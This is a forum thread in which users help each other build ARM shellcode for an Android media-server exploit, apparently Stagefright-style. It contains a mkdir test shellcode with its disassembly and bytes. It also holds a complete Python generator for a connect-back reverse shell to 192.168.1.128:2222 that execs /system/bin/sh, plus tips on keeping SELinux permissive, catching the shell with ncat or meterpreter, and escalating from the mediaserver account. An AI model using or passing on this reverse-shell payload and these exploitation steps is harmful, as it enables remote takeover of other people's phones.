Something about Shellcode

[3kyo0]

shellcode.s
.globl _start
.align 2
_start:
.code 32
adr r0,filename
adr r1,mode
mov r7, #39
swi #0 @mkdir(filename,mode)
mov r0, #0
mov r7, #1
swi #0 @EXIT(0)
mode:
.short 0x1ff
filename:
.asciz "/data/local/tmp/success"

shellcode disassemble:
.text:00008074 ; Segment type: Pure code
.text:00008074 AREA .text, CODE
.text:00008074 ; ORG 0x8074
.text:00008074 CODE32
.text:00008074
.text:00008074 EXPORT _start
.text:00008074 _start ; "/data/local/tmp/success"
.text:00008074 ADR R0, filename
.text:00008078 ADR R1, mode
.text:0000807C MOV R7, #0x27
.text:00008080 SVC 0
.text:00008084 MOV R0, #0
.text:00008088 MOV R7, #1
.text:0000808C SVC 0
.text:0000808C ; ---------------------------------------------------------------------------
.text:00008090 mode DCW 0x1FF ; DATA XREF: .text:00008078�o
.text:00008092 filename DCB "/data/local/tmp/success",0 ; DATA XREF: .text:_start�o
.text:000080AA DCW 0
.text:000080AA ; .text ends

shellcode.bin
16 00 8F E2 10 10 8F E2 27 70 A0 E3 00 00 00 EF
00 00 A0 E3 01 70 A0 E3 00 00 00 EF FF 01 2F 64
61 74 61 2F 6C 6F 63 61 6C 2F 74 6D 70 2F 73 75
63 63 65 73 73 00 00 00

could you tell me why my shellcode doesn't work? could you help me?

[3kyo0]

the problem has been solved, thank you for sharing the code

[3kyo0]

another problem：
F/libc ( 7739): Fatal signal 11 (SIGSEGV), code 1, fault addr 0x0 in tid 7770 (Bind
er_2)

[TirelessMan]

Hi Coodea, I am going change the Metaphor shell code with another one, But this need I develop a new shell code with ARM instruction. I can not find a shell code on the internet also.
Can you please upload/send/share your own shell code with me? Your shellcode.bin at the first comment seems dose not work and then you have resolved thats problem, can I have your shell code please? Or how can I develop my own shell code with ARM instruments? any source any references? thanks in advance

[3kyo0]

https://www.exploit-db.com/exploits/38124/ shellcode you can find
selinux must be Permissive

[3kyo0]

i have got a shell
id
uid=1013(media) gid=1005(audio) groups=1006(camera),1026(drmrpc),1031(mediadrm),3001(n
et_bt_admin),3002(net_bt),3003(inet),3007(net_bw_acct) context=u:r:mediaserver:s0

but another problems come.How to Privilege by mediaserver

[secmart]

Hi Coodea,

how did you export only the shellcode from the python file?
As for my understanding the shellcode generates with the function "def build_rop"
So I tried to write the variable "buf" to a file. I also tried it with "rop" but both shellcodes didn't work in my exploit. Can you explain in more detail how you get the shellcode?
thanks in advance

[3kyo0]

import struct
import socket
cb_port=2222
cb_host="192.168.1.128"
buf=''
buf += '\x02\x70\xa0\xe3'
buf += '\x00\x00\x00\xef'

continue if not parent

buf += '\x00\x00\x50\xe3'
buf += '\x02\x00\x00\x0a'

exit parent

buf += '\x00\x00\xa0\xe3'
buf += '\x01\x70\xa0\xe3'
buf += '\x00\x00\x00\xef'

setsid in child

buf += '\x42\x70\xa0\xe3'
buf += '\x00\x00\x00\xef'

socket/connect/dup2/dup2/dup2

buf += '\x02\x00\xa0\xe3\x01\x10\xa0\xe3\x05\x20\x81\xe2\x8c'
buf += '\x70\xa0\xe3\x8d\x70\x87\xe2\x00\x00\x00\xef\x00\x60'
buf += '\xa0\xe1\x6c\x10\x8f\xe2\x10\x20\xa0\xe3\x8d\x70\xa0'
buf += '\xe3\x8e\x70\x87\xe2\x00\x00\x00\xef\x06\x00\xa0\xe1'
buf += '\x00\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00\x00\xef\x06'
buf += '\x00\xa0\xe1\x01\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00'
buf += '\x00\xef\x06\x00\xa0\xe1\x02\x10\xa0\xe3\x3f\x70\xa0'
buf += '\xe3\x00\x00\x00\xef'

execve(shell, argv, env)

buf += '\x30\x00\x8f\xe2\x04\x40\x24\xe0'
buf += '\x10\x00\x2d\xe9\x38\x30\x8f\xe2\x08\x00\x2d\xe9\x0d'
buf += '\x20\xa0\xe1\x10\x00\x2d\xe9\x24\x40\x8f\xe2\x10\x00'
buf += '\x2d\xe9\x0d\x10\xa0\xe1\x0b\x70\xa0\xe3\x00\x00\x00'
buf += '\xef\x02\x00'

Add the connect back host/port

buf += struct.pack('!H', cb_port)
cb_host = socket.inet_aton(cb_host)
buf += struct.pack('=4s', cb_host)

shell

buf += '/system/bin/sh\x00\x00'

argv

buf += 'sh\x00\x00'

env

buf += 'PATH=/sbin:/vendor/bin:/system/sbin:/system/bin:/system/xbin\x00'

with open('p2222.bin','wb') as f:
f.write(buf)

[secmart]

Hi Coodea,

thx for your answer.
I build the shellcode and put it on the web server.
Now the client connect to my server but the session gets closed immediately.
I tried it with ncat under kali. There i got the message "Ncat: Connection from ...."
and in the same second ncat stopps.
I also tried metasploit with the payload android/meterpreter/reverse_tcp, there nothing happens.
With which tool did you listen to your port to get the remote shell?
How did you compile the python file? Did you compile it under your normal OS system or did you change something that it will work on arm processors?
thanks in advance

[3kyo0]

keep selinux Permissive

[TirelessMan]

Hi, Thanks 3kyo0 for your shell code,
Now I can run the shell code on the target device :), but I can not do some tasks such as creating a file or directory on the target with my shell code! As my shell code runs in media server process permissions, I am so limited on executing commands :(.
Question: How can I find media server process permissions? How can I know which permissions media server process has?
Thanks in advance